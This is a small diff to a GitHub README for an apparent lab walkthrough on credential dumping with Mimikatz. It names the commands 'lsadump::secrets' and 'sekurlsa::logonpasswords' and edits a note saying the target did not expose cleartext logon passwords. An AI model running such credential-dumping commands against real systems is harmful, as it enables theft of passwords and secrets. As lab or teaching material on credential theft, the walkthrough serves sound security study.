SavioFengGit/Credential-Dumping-with-Mimikatz/README.md

 ### Dump the secrets
  - lsadump::secrets <br>
 <img src="secret.png" width=70% height="auto"><br><br>
-### Dump the logon password, if bad configured, we have the password in clear text.
+### Dump the logon password.
+The password might be in clear text.
  - sekurlsa::logonpasswords <br>
 <img src="logon.png" width=70% height="auto"><br><br>

- Unfortunately, there is no logon password in clear text, because they disabled it, so it is well configured.
+ **Unfortunately, there is no logon password in clear text, because they disabled it, so it is well configured.**